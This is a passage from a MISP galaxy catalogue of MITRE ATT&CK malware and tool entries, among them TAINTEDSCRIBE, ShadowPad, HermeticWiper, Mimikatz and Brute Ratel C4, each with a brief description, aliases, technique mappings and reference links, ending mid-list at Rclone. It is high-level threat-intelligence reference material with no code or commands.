https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/

https://www.dragos.com/threat/wassonite/

https://www.zdnet.com/article/confirmed-north-korean-malware-found-on-indian-nuclear-plants-network/

TAINTEDSCRIBE - S0586

[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)

The tag is: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586"

TAINTEDSCRIBE - S0586 is also known as:

  • TAINTEDSCRIBE

Table 7801. Table References

Links

https://attack.mitre.org/software/S0586

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b

XCSSET - S0658

[XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)

The tag is: misp-galaxy:mitre-malware="XCSSET - S0658"

XCSSET - S0658 is also known as:

  • XCSSET

  • OSX.DubRobber

Table 7802. Table References

Links

https://attack.mitre.org/software/S0658

https://blog.malwarebytes.com/detections/osx-dubrobber/

https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf

EVILNUM - S0568

[EVILNUM](https://attack.mitre.org/software/S0568) is fully capable backdoor that was first identified in 2018. [EVILNUM](https://attack.mitre.org/software/S0568) is used by the APT group [Evilnum](https://attack.mitre.org/groups/G0120) which has the same name.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)

The tag is: misp-galaxy:mitre-malware="EVILNUM - S0568"

EVILNUM - S0568 is also known as:

  • EVILNUM

Table 7803. Table References

Links

https://attack.mitre.org/software/S0568

https://www.prevailion.com/phantom-in-the-command-shell-2/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

PowerPunch - S0685

[PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-malware="PowerPunch - S0685"

PowerPunch - S0685 is also known as:

  • PowerPunch

Table 7804. Table References

Links

https://attack.mitre.org/software/S0685

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

Diavol - S0659

[Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021)

The tag is: misp-galaxy:mitre-malware="Diavol - S0659"

Diavol - S0659 is also known as:

  • Diavol

Table 7805. Table References

Links

https://attack.mitre.org/software/S0659

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider

https://www.ic3.gov/Media/News/2022/220120.pdf

Explosive - S0569

[Explosive](https://attack.mitre.org/software/S0569) is a custom-made remote access tool used by the group [Volatile Cedar](https://attack.mitre.org/groups/G0123). It was first identified in the wild in 2015.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021)

The tag is: misp-galaxy:mitre-malware="Explosive - S0569"

Explosive - S0569 is also known as:

  • Explosive

Table 7806. Table References

Links

https://attack.mitre.org/software/S0569

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

ShadowPad - S0596

[ShadowPad](https://attack.mitre.org/software/S0596) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://attack.mitre.org/groups/G0096), but has since been observed to be used by various Chinese threat activity groups. (Citation: Recorded Future RedEcho Feb 2021)(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)

The tag is: misp-galaxy:mitre-malware="ShadowPad - S0596"

ShadowPad - S0596 is also known as:

  • ShadowPad

  • POISONPLUG.SHADOW

Table 7807. Table References

Links

https://attack.mitre.org/software/S0596

https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/08/07172148/ShadowPad_technical_description_PDF.pdf

https://securelist.com/shadowpad-in-corporate-networks/81432/

https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf

FrozenCell - S0577

[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)

The tag is: misp-galaxy:mitre-malware="FrozenCell - S0577"

FrozenCell - S0577 is also known as:

  • FrozenCell

Table 7808. Table References

Links

https://attack.mitre.org/software/S0577

https://blog.lookout.com/frozencell-mobile-threat

SUPERNOVA - S0578

[SUPERNOVA](https://attack.mitre.org/software/S0578) is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of [APT29](https://attack.mitre.org/groups/G0016)'s SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests [SUPERNOVA](https://attack.mitre.org/software/S0578) may have been used by the China-based threat group SPIRAL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: SolarWinds Advisory Dec 2020)(Citation: CISA Supernova Jan 2021)(Citation: Microsoft Analyzing Solorigate Dec 2020)

The tag is: misp-galaxy:mitre-malware="SUPERNOVA - S0578"

SUPERNOVA - S0578 is also known as:

  • SUPERNOVA

Table 7809. Table References

Links

https://attack.mitre.org/software/S0578

https://unit42.paloaltonetworks.com/solarstorm-supernova/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://www.solarwinds.com/sa-overview/securityadvisory

Penquin - S0587

[Penquin](https://attack.mitre.org/software/S0587) is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)

The tag is: misp-galaxy:mitre-malware="Penquin - S0587"

Penquin - S0587 is also known as:

  • Penquin

  • Penquin 2.0

  • Penquin_x64

Table 7810. Table References

Links

https://attack.mitre.org/software/S0587

https://securelist.com/the-penquin-turla-2/67962/

https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf

GoldFinder - S0597

[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="GoldFinder - S0597"

GoldFinder - S0597 is also known as:

  • GoldFinder

Table 7811. Table References

Links

https://attack.mitre.org/software/S0597

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Waterbear - S0579

[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)

The tag is: misp-galaxy:mitre-malware="Waterbear - S0579"

Waterbear - S0579 is also known as:

  • Waterbear

Table 7812. Table References

Links

https://attack.mitre.org/software/S0579

https://www.trendmicro.com/en_us/research/19/l/waterbear-is-back-uses-api-hooking-to-evade-security-product-detection.html

GoldMax - S0588

[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. [GoldMax](https://attack.mitre.org/software/S0588) was discovered in early 2021 during the investigation into the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), and has likely been used by [APT29](https://attack.mitre.org/groups/G0016) since at least mid-2019. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)

The tag is: misp-galaxy:mitre-malware="GoldMax - S0588"

GoldMax - S0588 is also known as:

  • GoldMax

  • SUNSHUTTLE

Table 7813. Table References

Links

https://attack.mitre.org/software/S0588

https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Sibot - S0589

[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="Sibot - S0589"

Sibot - S0589 is also known as:

  • Sibot

Table 7814. Table References

Links

https://attack.mitre.org/software/S0589

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Kinsing - S0599

[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)

The tag is: misp-galaxy:mitre-malware="Kinsing - S0599"

Kinsing - S0599 is also known as:

  • Kinsing

Table 7815. Table References

Links

https://attack.mitre.org/software/S0599

https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation

https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/

Gelsemium - S0666

[Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-malware="Gelsemium - S0666"

Gelsemium - S0666 is also known as:

  • Gelsemium

  • Gelsevirine

  • Gelsenicine

  • Gelsemine

Table 7816. Table References

Links

https://attack.mitre.org/software/S0666

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

Chrommme - S0667

[Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-malware="Chrommme - S0667"

Chrommme - S0667 is also known as:

  • Chrommme

Table 7817. Table References

Links

https://attack.mitre.org/software/S0667

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

QuietSieve - S0686

[QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022)

The tag is: misp-galaxy:mitre-malware="QuietSieve - S0686"

QuietSieve - S0686 is also known as:

  • QuietSieve

Table 7818. Table References

Links

https://attack.mitre.org/software/S0686

https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/

TinyTurla - S0668

[TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021)

The tag is: misp-galaxy:mitre-malware="TinyTurla - S0668"

TinyTurla - S0668 is also known as:

  • TinyTurla

Table 7819. Table References

Links

https://attack.mitre.org/software/S0668

https://blog.talosintelligence.com/2021/09/tinyturla.html

KOCTOPUS - S0669

[KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021)

The tag is: misp-galaxy:mitre-malware="KOCTOPUS - S0669"

KOCTOPUS - S0669 is also known as:

  • KOCTOPUS

Table 7820. Table References

Links

https://attack.mitre.org/software/S0669

https://www.malwarebytes.com/resources/files/2021/02/lazyscripter.pdf

Flagpro - S0696

[Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021)

The tag is: misp-galaxy:mitre-malware="Flagpro - S0696"

Flagpro - S0696 is also known as:

  • Flagpro

Table 7821. Table References

Links

https://attack.mitre.org/software/S0696

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

Torisma - S0678

[Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020)

The tag is: misp-galaxy:mitre-malware="Torisma - S0678"

Torisma - S0678 is also known as:

  • Torisma

Table 7822. Table References

Links

https://attack.mitre.org/software/S0678

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/

Ferocious - S0679

[Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021)

The tag is: misp-galaxy:mitre-malware="Ferocious - S0679"

Ferocious - S0679 is also known as:

  • Ferocious

Table 7823. Table References

Links

https://attack.mitre.org/software/S0679

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044

HermeticWiper - S0697

[HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)

The tag is: misp-galaxy:mitre-malware="HermeticWiper - S0697"

HermeticWiper - S0697 is also known as:

  • HermeticWiper

  • Trojan.Killdisk

  • DriveSlayer

Table 7824. Table References

Links

https://attack.mitre.org/software/S0697

https://blog.qualys.com/vulnerabilities-threat-research/2022/03/01/ukrainian-targets-hit-by-hermeticwiper-new-datawiper-malware

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia

https://www.cisa.gov/uscert/ncas/alerts/aa22-057a

https://www.crowdstrike.com/blog/how-crowdstrike-falcon-protects-against-wiper-malware-used-in-ukraine-attacks/

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine

https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack

https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine

Meteor - S0688

[Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021)

The tag is: misp-galaxy:mitre-malware="Meteor - S0688"

Meteor - S0688 is also known as:

  • Meteor

Table 7825. Table References

Links

https://attack.mitre.org/software/S0688

https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/

WhisperGate - S0689

[WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022)

The tag is: misp-galaxy:mitre-malware="WhisperGate - S0689"

WhisperGate - S0689 is also known as:

  • WhisperGate

Table 7826. Table References

Links

https://attack.mitre.org/software/S0689

https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/#whispergate-malware-family

https://www.cybereason.com/blog/cybereason-vs.-whispergate-wiper

https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/

HermeticWizard - S0698

[HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022)

The tag is: misp-galaxy:mitre-malware="HermeticWizard - S0698"

HermeticWizard - S0698 is also known as:

  • HermeticWizard

Table 7827. Table References

Links

https://attack.mitre.org/software/S0698

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine

mitre-tool

Name of ATT&CK software.

mitre-tool is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Windows Credential Editor - S0005

[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)

The tag is: misp-galaxy:mitre-tool="Windows Credential Editor - S0005"

Windows Credential Editor - S0005 is also known as:

  • Windows Credential Editor

  • WCE

Windows Credential Editor - S0005 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7828. Table References

Links

http://www.ampliasecurity.com/research/wcefaq.html

https://attack.mitre.org/software/S0005

Brute Ratel C4 - S1063

[Brute Ratel C4](https://attack.mitre.org/software/S1063) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://attack.mitre.org/software/S1063) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://attack.mitre.org/software/S1063) was leaked in the cybercriminal underground, leading to its use by threat actors.(Citation: Dark Vortex Brute Ratel C4)(Citation: Palo Alto Brute Ratel July 2022)(Citation: MDSec Brute Ratel August 2022)(Citation: SANS Brute Ratel October 2022)(Citation: Trend Micro Black Basta October 2022)

The tag is: misp-galaxy:mitre-tool="Brute Ratel C4 - S1063"

Brute Ratel C4 - S1063 is also known as:

  • Brute Ratel C4

  • BRc4

Table 7829. Table References

Links

https://attack.mitre.org/software/S1063

https://bruteratel.com/

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

https://www.sans.org/blog/cracked-brute-ratel-c4-framework-proliferates-across-the-cybercriminal-underground/

https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

Pass-The-Hash Toolkit - S0122

[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Pass-The-Hash Toolkit - S0122"

Pass-The-Hash Toolkit - S0122 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"

Table 7830. Table References

Links

https://attack.mitre.org/software/S0122

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

CSPY Downloader - S0527

[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020)

The tag is: misp-galaxy:mitre-tool="CSPY Downloader - S0527"

CSPY Downloader - S0527 is also known as:

  • CSPY Downloader

Table 7831. Table References

Links

https://attack.mitre.org/software/S0527

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

Imminent Monitor - S0434

[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.(Citation: Imminent Unit42 Dec2019)

The tag is: misp-galaxy:mitre-tool="Imminent Monitor - S0434"

Imminent Monitor - S0434 is also known as:

  • Imminent Monitor

Table 7832. Table References

Links

https://attack.mitre.org/software/S0434

https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/

Invoke-PSImage - S0231

[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)

The tag is: misp-galaxy:mitre-tool="Invoke-PSImage - S0231"

Invoke-PSImage - S0231 is also known as:

  • Invoke-PSImage

Invoke-PSImage - S0231 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7833. Table References

Links

https://attack.mitre.org/software/S0231

https://github.com/peewpw/Invoke-PSImage

ipconfig - S0100

[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system’s TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)

The tag is: misp-galaxy:mitre-tool="ipconfig - S0100"

ipconfig - S0100 is also known as:

  • ipconfig

ipconfig - S0100 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7834. Table References

Links

https://attack.mitre.org/software/S0100

https://technet.microsoft.com/en-us/library/bb490921.aspx

Mimikatz - S0002

[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)

The tag is: misp-galaxy:mitre-tool="Mimikatz - S0002"

Mimikatz - S0002 is also known as:

  • Mimikatz

Mimikatz - S0002 has relationships with:

  • similar: misp-galaxy:tool="Mimikatz" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7835. Table References

Links

https://adsecurity.org/?page_id=1821

https://attack.mitre.org/software/S0002

https://github.com/gentilkiwi/mimikatz

HTRAN - S0040

[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)

The tag is: misp-galaxy:mitre-tool="HTRAN - S0040"

HTRAN - S0040 is also known as:

  • HTRAN

  • HUC Packet Transmit Tool

HTRAN - S0040 has relationships with:

  • similar: misp-galaxy:malpedia="HTran" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 7836. Table References

Links

https://attack.mitre.org/software/S0040

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools

MCMD - S0500

[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074).(Citation: Secureworks MCMD July 2019)

The tag is: misp-galaxy:mitre-tool="MCMD - S0500"

MCMD - S0500 is also known as:

  • MCMD

Table 7837. Table References

Links

https://attack.mitre.org/software/S0500

https://www.secureworks.com/research/mcmd-malware-analysis

pwdump - S0006

[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)

The tag is: misp-galaxy:mitre-tool="pwdump - S0006"

pwdump - S0006 is also known as:

  • pwdump

pwdump - S0006 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7838. Table References

Links

https://attack.mitre.org/software/S0006

https://en.wikipedia.org/wiki/Pwdump

gsecdump - S0008

[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)

The tag is: misp-galaxy:mitre-tool="gsecdump - S0008"

gsecdump - S0008 is also known as:

  • gsecdump

gsecdump - S0008 has relationships with:

  • similar: misp-galaxy:malpedia="gsecdump" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7839. Table References

Links

https://attack.mitre.org/software/S0008

https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5

at - S0110

[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time.(Citation: TechNet At)(Citation: Linux at)

The tag is: misp-galaxy:mitre-tool="at - S0110"

at - S0110 is also known as:

  • at

  • at.exe

at - S0110 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 7840. Table References

Links

https://attack.mitre.org/software/S0110

https://man7.org/linux/man-pages/man1/at.1p.html

https://technet.microsoft.com/en-us/library/bb490866.aspx

ifconfig - S0101

[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)

The tag is: misp-galaxy:mitre-tool="ifconfig - S0101"

ifconfig - S0101 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7841. Table References

Links

https://attack.mitre.org/software/S0101

https://en.wikipedia.org/wiki/Ifconfig

Fgdump - S0120

[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Fgdump - S0120"

Fgdump - S0120 is also known as:

  • Fgdump

Fgdump - S0120 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 7842. Table References

Links

https://attack.mitre.org/software/S0120

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

nbtstat - S0102

[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)

The tag is: misp-galaxy:mitre-tool="nbtstat - S0102"

nbtstat - S0102 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7843. Table References

Links

https://attack.mitre.org/software/S0102

https://technet.microsoft.com/en-us/library/cc940106.aspx

route - S0103

[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)

The tag is: misp-galaxy:mitre-tool="route - S0103"

route - S0103 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 7844. Table References

Links

https://attack.mitre.org/software/S0103

https://technet.microsoft.com/en-us/library/bb490991.aspx

Rclone - S1040

